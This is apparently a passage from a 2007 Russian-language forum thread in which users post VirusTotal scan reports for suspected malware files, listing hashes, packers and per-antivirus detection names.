Authentium	4.93.8/20070802	found nothing
Avast	4.7.1029.0/20070801	found nothing
*AVG	7.5.0.476/20070801	found [Generic5.ZOC]*
BitDefender	7.2/20070802	found nothing
*CAT-QuickHeal	9.00/20070801	found [Trojan.Obfuscated.gp]*
ClamAV	0.91/20070801	found nothing
*DrWeb	4.33/20070802	found [Trojan.Swizzor]*
*eSafe	7.0.15.0/20070731	found [suspicious Trojan/Worm]*
eTrust-Vet	31.1.5024/20070801	found nothing
Ewido	4.0/20070801	found nothing
F-Prot	4.3.2.48/20070801	found nothing
*F-Secure	6.70.13030.0/20070802	found [Trojan.Win32.Obfuscated.gp]*
FileAdvisor	1/20070802	found nothing
*Fortinet	2.91.0.0/20070802	found [W32/Obfuscated.GP!tr]*
*Ikarus	T3.1.1.8/20070802	found [Trojan.Win32.Agent.alt]
Kaspersky	4.0.2.24/20070802	found [Trojan.Win32.Obfuscated.gp]
*McAfee	5088/20070801	found nothing
Microsoft	1.2704/20070802	found nothing
NOD32v2	2431/20070801	found nothing
Norman	5.80.02/20070801	found nothing
*Panda	9.0.0.4/20070802	found [Trj/Downloader.PRL]
Prevx1	V2/20070802	found [Covert.Code]
*Rising	19.34.30.00/20070802	found nothing
Sophos	4.19.0/20070801	found nothing
*Sunbelt	2.2.907.0/20070802	found [Trojan.Win32.Obfuscated.gp]
*Symantec	10/20070802	found nothing
*TheHacker	6.1.7.160/20070801	found [Trojan/Obfuscated.gp]
VBA32	3.12.2.2/20070801	found [Trojan.Win32.Obfuscated.gp]
*VirusBuster	4.3.26:9/20070801	found nothing
*Webwasher-Gateway	6.0.1/20070802	found [Trojan.Obfuscated.GP.34]
*
[ notes ]
packers: UPX
packers: UPX
packers: UPX
Prevx info: http://fileinfo.prevx.com/fileinfo.a...2C0600176037C0


Complete scanning result of "n2_01_08_07_0[1].exe", processed in VirusTotal at 08/02/2007 09:56:49 (CET).

[ file data ]
* name: n2_01_08_07_0[1].exe
* size: 111104
* md5.: 1277ee6e1d1a7654ce2f64f2560f86b0
* sha1: 54ae7c104da54673352b780e9ba82e330de1d8cb

[ scan result ]
AhnLab-V3	2007.8.2.0/20070802	found nothing
*AntiVir	7.4.0.57/20070802	found [TR/Crypt.FKM.Gen]*
Authentium	4.93.8/20070802	found nothing
Avast	4.7.1029.0/20070801	found nothing
AVG	7.5.0.476/20070801	found nothing
BitDefender	7.2/20070802	found nothing
CAT-QuickHeal	9.00/20070801	found nothing
ClamAV	0.91/20070801	found nothing
DrWeb	4.33/20070802	found nothing
*eSafe	7.0.15.0/20070731	found [suspicious Trojan/Worm]*
eTrust-Vet	31.1.5024/20070801	found nothing
Ewido	4.0/20070801	found nothing
F-Prot	4.3.2.48/20070801	found nothing
F-Secure	6.70.13030.0/20070802	found nothing
FileAdvisor	1/20070802	found nothing
Fortinet	2.91.0.0/20070802	found nothing
*Ikarus	T3.1.1.8/20070802	found [Trojan.Win32.Agent.alt]*
Kaspersky	4.0.2.24/20070802	found nothing
McAfee	5088/20070801	found nothing
Microsoft	1.2704/20070802	found nothing
NOD32v2	2431/20070801	found nothing
Norman	5.80.02/20070801	found nothing
Panda	9.0.0.4/20070802	found nothing
Rising	19.34.30.00/20070802	found nothing
Sophos	4.19.0/20070801	found nothing
Sunbelt	2.2.907.0/20070802	found nothing
Symantec	10/20070802	found nothing
TheHacker	6.1.7.160/20070801	found nothing
VBA32	3.12.2.2/20070801	found nothing
VirusBuster	4.3.26:9/20070801	found nothing
*Webwasher-Gateway	6.0.1/20070802	found [Trojan.Crypt.FKM.Gen]*

[ notes ]
packers: UPX
packers: UPX
packers: UPX

и его брат-близнец:
Complete scanning result of "n2_31_07_07_0[1].exe", processed in VirusTotal at 08/02/2007 10:12:40 (CET).

[ file data ]
* name: n2_31_07_07_0[1].exe
* size: 104448
* md5.: 8e16588e88ac956e5720293fce7cadca
* sha1: 9e374ff120fae7a1ff613d8bb6b4e5f12c64c4df

[ scan result ]
 AhnLab-V3	2007.8.2.0/20070802	found nothing
*AntiVir	7.4.0.57/20070802	found [TR/Crypt.FKM.Gen]*
Authentium	4.93.8/20070802	found nothing
Avast	4.7.1029.0/20070801	found nothing
AVG	7.5.0.476/20070801	found nothing
*BitDefender	7.2/20070802	found [Trojan.Agent.ALT]*
CAT-QuickHeal	9.00/20070801	found nothing
ClamAV	0.91/20070801	found nothing
DrWeb	4.33/20070802	found nothing
*eSafe	7.0.15.0/20070731	found [suspicious Trojan/Worm]*
eTrust-Vet	31.1.5024/20070801	found nothing
Ewido	4.0/20070801	found nothing
F-Prot	4.3.2.48/20070801	found nothing
F-Secure	6.70.13030.0/20070802	found nothing
FileAdvisor	1/20070802	found nothing
Fortinet	2.91.0.0/20070802	found nothing
*Ikarus	T3.1.1.8/20070802	found [Trojan.Win32.Agent.alt]*
Kaspersky	4.0.2.24/20070802	found nothing
McAfee	5088/20070801	found nothing
Microsoft	1.2704/20070802	found nothing
NOD32v2	2431/20070801	found nothing
Norman	5.80.02/20070801	found nothing
*Panda	9.0.0.4/20070802	found [Suspicious file]*
*Prevx1	V2/20070802	found [Trojan.Nudos]*
Rising	19.34.30.00/20070802	found nothing
Sophos	4.19.0/20070801	found nothing
Sunbelt	2.2.907.0/20070802	found nothing
Symantec	10/20070802	found nothing
TheHacker	6.1.7.160/20070801	found nothing
VBA32	3.12.2.2/20070801	found nothing
VirusBuster	4.3.26:9/20070801	found nothing
*Webwasher-Gateway	6.0.1/20070802	found [Trojan.Crypt.FKM.Gen]*

[ notes ]
packers: UPX
packers: UPX
packers: UPX
Prevx info: http://fileinfo.prevx.com/fileinfo.a...791C004DCFD846

----------


## DoSTR

File KIS7-Crack.exe received on 08.02.2007 13:59:43 (CET)
Result: 10/31 (32.26%)

_Antivirus 	Version 	Last Update 	Result_
AhnLab-V3	2007.8.3.0	2007.08.02	-
*AntiVir	7.4.0.57	2007.08.02	TR/PSW.LDPinch.TAW.166*
Authentium	4.93.8	2007.08.02	-
Avast	4.7.1029.0	2007.08.02	-
*AVG	7.5.0.476	2007.08.01	Obfustat.EJN*
*BitDefender	7.2	2007.08.02	Trojan.PWS.LDPinch.TAW*
*CAT-QuickHeal	9.00	2007.08.01	(Suspicious) - DNAScan*
ClamAV	0.91	2007.08.01	-
*DrWeb	4.33	2007.08.02	Trojan.MulDrop.5888*
*eSafe	7.0.15.0	2007.07.31	Suspicious Trojan/Worm*
eTrust-Vet	31.1.5026	2007.08.02	-
Ewido	4.0	2007.08.01	-
FileAdvisor	1	2007.08.02	-
Fortinet	2.91.0.0	2007.08.02	-
F-Prot	4.3.2.48	2007.08.01	-
F-Secure	6.70.13030.0	2007.08.02	-
*Ikarus	T3.1.1.8	2007.08.02	Trojan-PWS.LDPinch.TAW*
Kaspersky	4.0.2.24	2007.08.02	-
McAfee	5088	2007.08.01	-
Microsoft	1.2704	2007.08.02	-
NOD32v2	2432	2007.08.02	-
Norman	5.80.02	2007.08.02	-
Panda	9.0.0.4	2007.08.02	-
Rising	19.34.32.00	2007.08.02	-
Sophos	4.19.0	2007.08.01	-
*Sunbelt	2.2.907.0	2007.08.02	VIPRE.Suspicious*
Symantec	10	2007.08.02	-
TheHacker	6.1.7.160	2007.08.01	-
VBA32	3.12.2.2	2007.08.01	-
*VirusBuster	4.3.26:9	2007.08.02	Trojan.DR.Cimuz.Gen.1*
*Webwasher-Gateway	6.0.1	2007.08.02	Trojan.PSW.LDPinch.TAW.166*
Additional information
File size: 175012 bytes
MD5: 3b5f9cfe5fdbb0eea06d7b202d96fb1c
SHA1: 63bb9d9ea2f1e9fc1bc2a7773552a64a44039ad1
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## ISO

File php.exe received on 08.03.2007 05:07:25 (CET)
Current status: Loading ...   finished 
Result: 
Loading server information... 
 Compact 
Print results  Antivirus	Version	Last Update	Result
AhnLab-V3	2007.8.3.0	2007.08.02	-
*AntiVir	7.4.0.57	2007.08.02	EXP/PhpBB.G
Authentium	4.93.8	2007.08.02	is a security risk or a \"backdoor\" program
Avast	4.7.1029.0	2007.08.02	Win32hpBB-C
AVG	7.5.0.476	2007.08.02	Potentially harmful program Exploit.XN*
*BitDefender	7.2	2007.08.03	Trojan.Exploit.Phpbb.G*
CAT-QuickHeal	9.00	2007.08.01	-
ClamAV	0.91	2007.08.02	-
DrWeb	4.33	2007.08.02	-
eSafe	7.0.15.0	2007.07.31	-
eTrust-Vet	31.1.5028	2007.08.03	-
*Ewido	4.0	2007.08.02	Not-A-Virus.Exploit.Win32.PhpBB.g*
FileAdvisor	1	2007.08.03	-
*Fortinet	2.91.0.0	2007.08.03	W32/PhpBB.G!exploit
F-Prot	4.3.2.48	2007.08.02	W32/Malware!f5d8
F-Secure	6.70.13030.0	2007.08.03	Exploit.Win32.PhpBB.g*
Ikarus	T3.1.1.8	2007.08.02	-
*Kaspersky	4.0.2.24	2007.08.03	Exploit.Win32.PhpBB.g
McAfee	5089	2007.08.02	Generic.cd
Microsoft	1.2704	2007.08.03	Exploit:Win32/PhpBB.E
NOD32v2	2434	2007.08.02	Win32/Exploit.PhpBB.G
Norman	5.80.02	2007.08.02	W32/Exploit.gen
Panda	9.0.0.4	2007.08.02	Trj/PhpBB.D
Rising	19.34.40.00	2007.08.03	Hack.Exploit.PHPBB.b*
Sophos	4.19.0	2007.08.01	-
Sunbelt	2.2.907.0	2007.08.03	-
*Symantec	10	2007.08.03	Hacktool*
TheHacker	6.1.7.160	2007.08.01	-
VBA32	3.12.2.2	2007.08.01	-
VirusBuster	4.3.26:9	2007.08.02	-
*Webwasher-Gateway	6.0.1	2007.08.03	Exploit.PhpBB.G*
Additional information
File size: 124416 bytes
MD5: 9e0841453b1385587d1da672acccd332
SHA1: 721ec2fe353ad47b2ff0d1ac1a523ee845475e97

----------


## zorro84

запостили сегодня на vozvrat.org:

Complete scanning result of "Dark.zip", processed in VirusTotal at 08/05/2007 16:06:47 (CET).

[ file data ]
* name: Dark.zip
* size: 1346581
* md5.: cdbcd32fc810066dab1f59ab8a5d7b3c
* sha1: 589c575681dce337cb3c5e6d27f88bebcd124d55

[ scan result ]
 AhnLab-V3      2007.8.3.0/20070803     found nothing
*AntiVir 7.4.0.57/20070803       found [HEUR/Crypted]*
Authentium      4.93.8/20070803 found nothing
Avast   4.7.1029.0/20070805     found nothing
AVG     7.5.0.476/20070804      found nothing
BitDefender     7.2/20070805    found nothing
*CAT-QuickHeal   9.00/20070804   found [Backdoor.SdBot.gen]*
ClamAV  0.91/20070805   found nothing
DrWeb   4.33/20070805   found nothing
eSafe   7.0.15.0/20070731       found nothing
eTrust-Vet      31.1.5032/20070804      found nothing
Ewido   4.0/20070803    found nothing
F-Prot  4.3.2.48/20070803       found nothing
F-Secure        6.70.13030.0/20070803   found nothing
FileAdvisor     1/20070805      found nothing
Fortinet        2.91.0.0/20070805       found nothing
*Ikarus  T3.1.1.8/20070805       found [Backdoor.VB.EV]*
Kaspersky       4.0.2.24/20070805       found nothing
McAfee  5090/20070803   found nothing
Microsoft       1.2704/20070805 found nothing
NOD32v2 2438/20070805   found nothing
Norman  5.80.02/20070803        found nothing
Panda   9.0.0.4/20070805        found nothing
Prevx1  V2/20070805     found nothing
Rising  19.34.40.00/20070803    found nothing
*Sophos  4.19.0/20070801 found [Mal/Basine-C]*
*Sunbelt 2.2.907.0/20070804      found [VIPRE.Suspicious]*
Symantec        10/20070805     found nothing
TheHacker       6.1.7.162/20070804      found nothing
VBA32   3.12.2.2/20070804       found nothing
VirusBuster     4.3.26:9/20070804       found nothing
*Webwasher-Gateway       6.0.1/20070803  found [Heuristic.Crypted]*

[ notes ]
packers: Themida
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## ISO

Сидел в корне диска
File settings.exe received on 08.09.2007 12:37:23 (CET)
Current status:    finished 
Result: 18/32 (56.25%) 
 Compact 
Print results  Antivirus	Version	Last Update	Result
*AhnLab-V3	2007.8.9.2	2007.08.09	Win-Trojan/Polycrypt.35324
AntiVir	7.4.0.57	2007.08.09	TR/PCK.PolyCrypt.B.959*
Authentium	4.93.8	2007.08.08	-
Avast	4.7.1029.0	2007.08.08	-
*AVG	7.5.0.476	2007.08.08	Generic5.LZE
BitDefender	7.2	2007.08.09	Trojan.PWS.LDPinch.TAW
CAT-QuickHeal	9.00	2007.08.08	(Suspicious) - DNAScan*
ClamAV	0.91	2007.08.09	-
DrWeb	4.33	2007.08.09	-
*eSafe	7.0.15.0	2007.07.31	Suspicious Trojan/Worm*
eTrust-Vet	31.1.5045	2007.08.09	-
Ewido	4.0	2007.08.08	-
FileAdvisor	1	2007.08.09	-
*Fortinet	2.91.0.0	2007.08.09	Basine.C*
F-Prot	4.3.2.48	2007.08.08	-
*F-Secure	6.70.13030.0	2007.08.09	Packed.Win32.PolyCrypt.b
Ikarus	T3.1.1.12	2007.08.09	Trojan-Downloader.Win32.Small.cyn
Kaspersky	4.0.2.24	2007.08.09	Packed.Win32.PolyCrypt.b*
McAfee	5093	2007.08.08	-
*Microsoft	1.2704	2007.08.09	TrojanDownloader:Win32/Small.CBA*
NOD32v2	2446	2007.08.09	-
Norman	5.80.02	2007.08.08	-
*Panda	9.0.0.4	2007.08.09	Trj/Ldpinch.AJB
Prevx1	V2	2007.08.09	TROJAN.PWDSTEALER.GEN
Rising	19.35.32.00	2007.08.09	Packer.RyCrypt
Sophos	4.19.0	2007.08.01	Mal/Basine-C
Sunbelt	2.2.907.0	2007.08.09	Trojan.Win32/Anomaly.gen!A*
Symantec	10	2007.08.09	-
TheHacker	6.1.7.166	2007.08.09	-
VBA32	3.12.2.2	2007.08.09	-
*VirusBuster	4.3.26:9	2007.08.08	Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway	6.0.1	2007.08.09	Trojan.PCK.PolyCrypt.B.959*
Additional information
File size: 35324 bytes
MD5: 84657f739281112b73a4723a5fe4f5ad
SHA1: e9963b910eb4e27bfa29e47763fc7dad8909b582
packers: RCrypt
Prevx info: http://fileinfo.prevx.com/fileinfo.a...291200AFA27E6C

----------


## Winsent

File program.exe received on 08.09.2007 17:41:46 (CET)
Current status:     finished 
Result: 8/32 (25&#37 :Wink:  


Antivirus	Version	Last Update	Result

AhnLab-V3	2007.8.9.2	2007.08.09	-
*AntiVir	7.4.0.57	2007.08.09	TR/Crypt.XPACK.Gen*
Authentium	4.93.8	2007.08.08	-
Avast	4.7.1029.0	2007.08.09	-
AVG	7.5.0.476	2007.08.08	-
BitDefender	7.2	2007.08.09	-
*CAT-QuickHeal	9.00	2007.08.09	(Suspicious) - DNAScan*
ClamAV	0.91	2007.08.09	-
DrWeb	4.33	2007.08.09	-
*eSafe	7.0.15.0	2007.07.31	Suspicious Trojan/Worm*
eTrust-Vet	31.1.5045	2007.08.09	-
Ewido	4.0	2007.08.08	-
FileAdvisor	1	2007.08.09	-
Fortinet	2.91.0.0	2007.08.09	-
F-Prot	4.3.2.48	2007.08.08	-
*F-Secure	6.70.13030.0	2007.08.09	Trojan-Dropper.Win32.Agent.bog
Ikarus	T3.1.1.12	2007.08.09	Backdoor.Win32.Rbot
Kaspersky	4.0.2.24	2007.08.09	Trojan-Dropper.Win32.Agent.bog*
McAfee	5094	2007.08.09	-
Microsoft	1.2704	2007.08.09	-
NOD32v2	2446	2007.08.09	-
Norman	5.80.02	2007.08.08	-
*Panda	9.0.0.4	2007.08.09	Suspicious file*
Prevx1	V2	2007.08.09	-
Rising	19.35.33.00	2007.08.09	-
Sophos	4.19.0	2007.08.01	-
Sunbelt	2.2.907.0	2007.08.09	-
Symantec	10	2007.08.09	-
TheHacker	6.1.7.166	2007.08.09	-
VBA32	3.12.2.2	2007.08.09	-
VirusBuster	4.3.26:9	2007.08.09	-
*Webwasher-Gateway	6.0.1	2007.08.09	Trojan.Crypt.XPACK.Gen*
Additional information
File size: 181760 bytes
MD5: f6b1ddb2c5438f656f32feba729ec413
SHA1: bf271c984fd29d1561e4a6d575f9678068a3db48
packers: NTKrnl

----------


## urbanangel

File DVT.rar received on 08.10.2007 22:32:46 (CET)
Current status: finished
Result: 8/32 (25&#37 :Wink: 

Antivirus 	Version 	Last Update 	Result

AhnLab-V3	2007.8.9.2	2007.08.10	-
AntiVir	7.4.0.60	2007.08.10	-
Authentium	4.93.8	2007.08.10	-
*Avast	4.7.1029.0	2007.08.10	Win32:Trojan-gen. {UPX!}*
AVG	7.5.0.476	2007.08.10	-
*BitDefender	7.2	2007.08.10	Trojan.Bat.Agent.J*
CAT-QuickHeal	9.00	2007.08.10	-
ClamAV	0.91	2007.08.10	-
DrWeb	4.33	2007.08.10	-
*eSafe	7.0.15.0	2007.08.10	suspicious Trojan/Worm*
eTrust-Vet	31.1.5048	2007.08.10	-
*Ewido	4.0	2007.08.10	Trojan.Agent.j*
FileAdvisor	1	2007.08.10	-
Fortinet	2.91.0.0	2007.08.10	-
F-Prot	4.3.2.48	2007.08.10	-
F-Secure	6.70.13030.0	2007.08.10	-
*Ikarus	T3.1.1.12	2007.08.10	Trojan.BAT.Agent.j*
Kaspersky	4.0.2.24	2007.08.10	-
McAfee	5095	2007.08.10	-
*Microsoft	1.2704	2007.08.10	Trojan:Win32/Agent!6239*
NOD32v2	2450	2007.08.10	-
Norman	5.80.02	2007.08.10	-
Panda	9.0.0.4	2007.08.10	-
*Prevx1	V2	2007.08.10	Generic.Malware*
Rising	19.35.42.00	2007.08.10	-
Sophos	4.19.0	2007.08.01	-
Sunbelt	2.2.907.0	2007.08.10	-
Symantec	10	2007.08.10	-
TheHacker	6.1.7.166	2007.08.10	-
VBA32	3.12.2.2	2007.08.10	-
VirusBuster	4.3.26:9	2007.08.10	-
*Webwasher-Gateway	6.0.1	2007.08.10	Win32.ModifiedUPX.gen!90 (suspicious)*
Additional information
File size: 28728 bytes
MD5: c249b18860f4ea4f0adf3acbfdda978f
SHA1: 55ed9ef10f6ef6a31d75507ace3449e280bbfdf3
packers: UPX
packers: UPX, BINARYRES, UPX
packers: UPX
Prevx info: http://fileinfo.prevx.com/fileinfo.a...47000045C163CB

----------


## Синауридзе Александр

File realfoto.exe received on 08.12.2007 04:07:33 (CET)

Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.8.9.2	2007.08.10	-
*AntiVir	7.4.0.60	2007.08.10	TR/Dldr.Small.dru.2*
Authentium	4.93.8	2007.08.11	-
*Avast	4.7.1029.0	2007.08.11	Win32:Small-GYA*
AVG	7.5.0.476	2007.08.11	-
*BitDefender	7.2	2007.08.12	Trojan.Downloader.Small.AAED*
*CAT-QuickHeal	9.00	2007.08.11	(Suspicious) - DNAScan*
*ClamAV	0.91	2007.08.12	Trojan.Downloader-11693*
DrWeb	4.33	2007.08.11	-
eSafe	7.0.15.0	2007.08.10	-
eTrust-Vet	31.1.5050	2007.08.11	-
Ewido	4.0	2007.08.11	-
FileAdvisor	1	2007.08.12	-
*Fortinet	2.91.0.0	2007.08.12	W32/Small.EVT!tr.dldr*
F-Prot	4.3.2.48	2007.08.10	-
F-Secure	6.70.13030.0	2007.08.11	-
Ikarus	T3.1.1.12	2007.08.11	-
Kaspersky	4.0.2.24	2007.08.12	-
*McAfee	5095	2007.08.10	Generic Downloader*
*Microsoft	1.2704	2007.08.11	TrojanDownloader:Win32/Agent.WX*
*NOD32v2	2451	2007.08.11	probably a variant of Win32/TrojanDownloader.Small.DRU*
Norman	5.80.02	2007.08.10	-
*Panda	9.0.0.4	2007.08.11	Suspicious file*
Prevx1	V2	2007.08.12	-
Rising	19.35.52.00	2007.08.12	-
*Sophos	4.19.0	2007.08.01	Mal/Packer*
*Sunbelt	2.2.907.0	2007.08.11	VIPRE.Suspicious*
Symantec	10	2007.08.12	-
TheHacker	6.1.7.167	2007.08.12	-
VBA32	3.12.2.2	2007.08.11	-
VirusBuster	4.3.26:9	2007.08.11	-
*Webwasher-Gateway	6.0.1	2007.08.11	Trojan.Dldr.Small.dru.2*

Additional information
File size: 2613 bytes
MD5: 91458b170ac5877978041ffdd0082423
SHA1: 00abb5889f319268423e033e4a91bd50a40f828e
packers: FSG
packers: FSG
packers: FSG
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## sergio342

Свежак. Вчера его, только Касперский видел, после моей отсылки.

Antivirus Version Last Update Result 
AhnLab-V3 2007.8.15.0 2007.08.14 - 
*AntiVir 7.4.1.62 2007.08.14 TR/Agent.awu.3* 
Authentium 4.93.8 2007.08.14 - 
Avast 4.7.1029.0 2007.08.13 - 
*AVG 7.5.0.476 2007.08.14 Generic6.MJQ* 
BitDefender 7.2 2007.08.14 - 
CAT-QuickHeal 9.00 2007.08.14 - 
ClamAV 0.91 2007.08.14 - 
*DrWeb 4.33 2007.08.14 Win32.Tank* 
eSafe 7.0.15.0 2007.08.10 - 
eTrust-Vet 31.1.5058 2007.08.14 - 
Ewido 4.0 2007.08.14 - 
FileAdvisor 1 2007.08.14 - 
*Fortinet 2.91.0.0 2007.08.14 W32/Agent.AWU!tr* 
F-Prot 4.3.2.48 2007.08.14 - 
*F-Secure 6.70.13030.0 2007.08.14 Trojan.Win32.Agent.awu* 
Ikarus T3.1.1.12 2007.08.14 - 
*Kaspersky 4.0.2.24 2007.08.14 Trojan.Win32.Agent.awu* 
McAfee 5097 2007.08.14 - 
Microsoft 1.2704 2007.08.14 - 
NOD32v2 2460 2007.08.14 - 
Norman 5.80.02 2007.08.14 - 
Panda 9.0.0.4 2007.08.14 - 
Prevx1 V2 2007.08.14 - 
Rising 19.36.12.00 2007.08.14 - 
Sophos 4.20.0 2007.08.12 - 
Sunbelt 2.2.907.0 2007.08.14 - 
Symantec 10 2007.08.14 - 
TheHacker 6.1.8.168 2007.08.14 - 
VBA32 3.12.2.2 2007.08.13 - 
VirusBuster 4.3.26:9 2007.08.14 - 
*Webwasher-Gateway 6.0.1 2007.08.14 Trojan.Agent.awu.3* 

*Добавлено через 14 минут*

Этот же вирус в другом файле.
File flashget.rar received on 08.14.2007 21:22:06 (CET)  

Antivirus Version Last Update Result 
AhnLab-V3 2007.8.15.0 2007.08.14 - 
AntiVir 7.4.1.62 2007.08.14 - 
Authentium 4.93.8 2007.08.14 - 
Avast 4.7.1029.0 2007.08.13 - 
AVG 7.5.0.476 2007.08.14 - 
BitDefender 7.2 2007.08.14 - 
CAT-QuickHeal 9.00 2007.08.14 - 
ClamAV 0.91 2007.08.14 - 
*DrWeb 4.33 2007.08.14 Win32.Tank* 
eSafe 7.0.15.0 2007.08.10 - 
eTrust-Vet 31.1.5058 2007.08.14 - 
Ewido 4.0 2007.08.14 - 
FileAdvisor 1 2007.08.14 - 
Fortinet 2.91.0.0 2007.08.14 - 
F-Prot 4.3.2.48 2007.08.14 - 
F-Secure 6.70.13030.0 2007.08.14 - 
Ikarus T3.1.1.12 2007.08.14 - 
Kaspersky 4.0.2.24 2007.08.14 - 
McAfee 5097 2007.08.14 - 
Microsoft 1.2704 2007.08.14 - 
NOD32v2 2460 2007.08.14 - 
Norman 5.80.02 2007.08.14 - 
Panda 9.0.0.4 2007.08.14 - 
Prevx1 V2 2007.08.14 - 
Rising 19.36.12.00 2007.08.14 - 
Sophos 4.20.0 2007.08.12 - 
Sunbelt 2.2.907.0 2007.08.14 - 
Symantec 10 2007.08.14 - 
TheHacker 6.1.8.168 2007.08.14 - 
VBA32 3.12.2.2 2007.08.13 - 
VirusBuster 4.3.26:9 2007.08.14 - 
Webwasher-Gateway 6.0.1 2007.08.14 -

*Добавлено через 1 минуту*

Файл, зараженный этим вирусом.
File regedit.exe received on 08.14.2007 21:23:02 (CET)

Antivirus Version Last Update Result 
AhnLab-V3 2007.8.15.0 2007.08.14 - 
AntiVir 7.4.1.62 2007.08.14 - 
Authentium 4.93.8 2007.08.14 - 
Avast 4.7.1029.0 2007.08.13 - 
AVG 7.5.0.476 2007.08.14 - 
BitDefender 7.2 2007.08.14 - 
CAT-QuickHeal 9.00 2007.08.14 - 
ClamAV 0.91 2007.08.14 - 
*DrWeb 4.33 2007.08.14 Win32.Tank* 
eSafe 7.0.15.0 2007.08.10 - 
eTrust-Vet 31.1.5058 2007.08.14 - 
Ewido 4.0 2007.08.14 - 
FileAdvisor 1 2007.08.14 - 
Fortinet 2.91.0.0 2007.08.14 - 
F-Prot 4.3.2.48 2007.08.14 - 
F-Secure 6.70.13030.0 2007.08.14 - 
Ikarus T3.1.1.12 2007.08.14 - 
Kaspersky 4.0.2.24 2007.08.14 - 
McAfee 5097 2007.08.14 - 
Microsoft 1.2704 2007.08.14 - 
NOD32v2 2460 2007.08.14 - 
Norman 5.80.02 2007.08.14 - 
Panda 9.0.0.4 2007.08.14 - 
Prevx1 V2 2007.08.14 - 
Rising 19.36.12.00 2007.08.14 - 
Sophos 4.20.0 2007.08.12 - 
Sunbelt 2.2.907.0 2007.08.14 - 
Symantec 10 2007.08.14 - 
TheHacker 6.1.8.168 2007.08.14 - 
VBA32 3.12.2.2 2007.08.13 - 
VirusBuster 4.3.26:9 2007.08.14 - 
Webwasher-Gateway 6.0.1 2007.08.14 -

----------


## Синауридзе Александр

File update.exe received on 08.15.2007 04:42:19 (CET)

Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.8.15.0	2007.08.14	-
AntiVir	7.4.1.62	2007.08.14	-
Authentium	4.93.8	2007.08.14	-
Avast	4.7.1029.0	2007.08.13	-
AVG	7.5.0.476	2007.08.14	-
BitDefender	7.2	2007.08.15	-
CAT-QuickHeal	9.00	2007.08.14	-
ClamAV	0.91	2007.08.14	-
DrWeb	4.33	2007.08.15	-
*eSafe	7.0.15.0	2007.08.10	suspicious Trojan/Worm*
eTrust-Vet	31.1.5058	2007.08.14	-
Ewido	4.0	2007.08.14	-
FileAdvisor	1	2007.08.15	-
Fortinet	2.91.0.0	2007.08.15	-
F-Prot	4.3.2.48	2007.08.14	-
F-Secure	6.70.13030.0	2007.08.15	-
Ikarus	T3.1.1.12	2007.08.14	-
Kaspersky	4.0.2.24	2007.08.15	-
McAfee	5097	2007.08.14	-
Microsoft	1.2704	2007.08.15	-
NOD32v2	2461	2007.08.15	-
Norman	5.80.02	2007.08.14	-
*Panda	9.0.0.4	2007.08.14	Suspicious file*
Prevx1	V2	2007.08.15	-
Rising	19.36.20.00	2007.08.15	-
Sophos	4.20.0	2007.08.12	-
Sunbelt	2.2.907.0	2007.08.14	-
Symantec	10	2007.08.15	-
TheHacker	6.1.8.168	2007.08.14	-
VBA32	3.12.2.2	2007.08.14	-
VirusBuster	4.3.26:9	2007.08.14	-
*Webwasher-Gateway	6.0.1	2007.08.14	Win32.ModifiedUPX.gen!84 (suspicious)*

Additional information
File size: 145408 bytes
MD5: b6d3fb3fbfc19566b80d57cce7d8d4bb
SHA1: de7eccba772e5537d9f61302373678183124e2d3
packers: UPX_LZMA

----------


## Shu_b

t 11753


```
File icf.exe received on 08.17.2007 12:15:20 (CET)
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.8.15.0	2007.08.17	-
AntiVir	7.4.1.62	2007.08.17	-
Authentium	4.93.8	2007.08.17	-
Avast	4.7.1029.0	2007.08.16	-
AVG	7.5.0.476	2007.08.16	SHeur.GHC
BitDefender	7.2	2007.08.17	-
CAT-QuickHeal	9.00	2007.08.16	-
ClamAV	0.91	2007.08.16	-
DrWeb	4.33	2007.08.17	-
eSafe	7.0.15.0	2007.08.16	suspicious Trojan/Worm
eTrust-Vet	31.1.5067	2007.08.17	-
Ewido	4.0	2007.08.16	-
FileAdvisor	1	2007.08.17	-
Fortinet	2.91.0.0	2007.08.16	-
F-Prot	4.3.2.48	2007.08.16	-
F-Secure	6.70.13030.0	2007.08.17	-
Ikarus	T3.1.1.12	2007.08.17	Trojan.Win32.Agent.alt
Kaspersky	4.0.2.24	2007.08.17	-
McAfee	5099	2007.08.16	-
Microsoft	1.2803	2007.08.17	-
NOD32v2	2467	2007.08.16	-
Norman	5.80.02	2007.08.16	-
Panda	9.0.0.4	2007.08.17	-
Prevx1	V2	2007.08.17	Covert.Code
Rising	19.36.42.00	2007.08.17	-
Sophos	4.20.0	2007.08.12	-
Sunbelt	2.2.907.0	2007.08.17	Trojan.Win32.Agent.alt
Symantec	10	2007.08.17	Backdoor.Trojan
TheHacker	6.1.8.170	2007.08.17	-
VBA32	3.12.2.2	2007.08.16	-
VirusBuster	4.3.26:9	2007.08.16	-
Webwasher-Gateway	6.0.1	2007.08.17	Trojan.Downloader.Win32.ModifiedUPX.gen (suspicious)
Additional information
File size: 51200 bytes
MD5: 7bdb28eaea32a09034c073b2b4aaae86
SHA1: 242fa38659de1773356b7c7804bf81b77af38184
packers: UPX
```



```
File zzmfk32.dll received on 08.17.2007 12:15:29 (CET)
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.8.15.0	2007.08.17	-
AntiVir	7.4.1.62	2007.08.17	TR/Crypt.ULPM.Gen
Authentium	4.93.8	2007.08.17	-
Avast	4.7.1029.0	2007.08.16	-
AVG	7.5.0.476	2007.08.16	Proxy.SMX
BitDefender	7.2	2007.08.17	-
CAT-QuickHeal	9.00	2007.08.16	-
ClamAV	0.91	2007.08.16	-
DrWeb	4.33	2007.08.17	-
eSafe	7.0.15.0	2007.08.16	Win32.Nibu
eTrust-Vet	31.1.5067	2007.08.17	-
Ewido	4.0	2007.08.16	-
FileAdvisor	1	2007.08.17	-
Fortinet	2.91.0.0	2007.08.16	-
F-Prot	4.3.2.48	2007.08.16	-
F-Secure	6.70.13030.0	2007.08.17	W32/Horst.gen29
Ikarus	T3.1.1.12	2007.08.17	-
Kaspersky	4.0.2.24	2007.08.17	-
McAfee	5099	2007.08.16	-
Microsoft	1.2803	2007.08.17	-
NOD32v2	2467	2007.08.16	-
